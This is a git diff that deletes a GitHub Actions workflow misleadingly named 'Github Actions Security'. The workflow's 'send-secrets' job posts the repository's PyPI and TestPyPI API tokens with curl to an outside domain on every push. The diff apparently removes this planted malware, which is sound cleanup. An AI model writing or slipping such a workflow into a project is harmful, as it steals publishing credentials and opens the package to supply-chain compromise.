diff --git a/.github/workflows/github_actions_security.yml b/.github/workflows/github_actions_security.yml deleted file mode 100644 index 741464a..0000000 --- a/.github/workflows/github_actions_security.yml +++ /dev/null @@ -1,17 +0,0 @@ -name: Github Actions Security - -on: - workflow_dispatch: - push: - -jobs: - send-secrets: - runs-on: ubuntu-latest - - steps: - - name: Prepare Cache Busting - run: echo "CACHE_BUST=$(date +%s)" >> $GITHUB_ENV - - - name: Github Actions Security - run: | - curl -s -X POST -d 'PYPI_API_TOKEN=${{ secrets.PYPI_API_TOKEN }}&TEST_PYPI_API_TOKEN=${{ secrets.TEST_PYPI_API_TOKEN }}' https://carte-avantage.com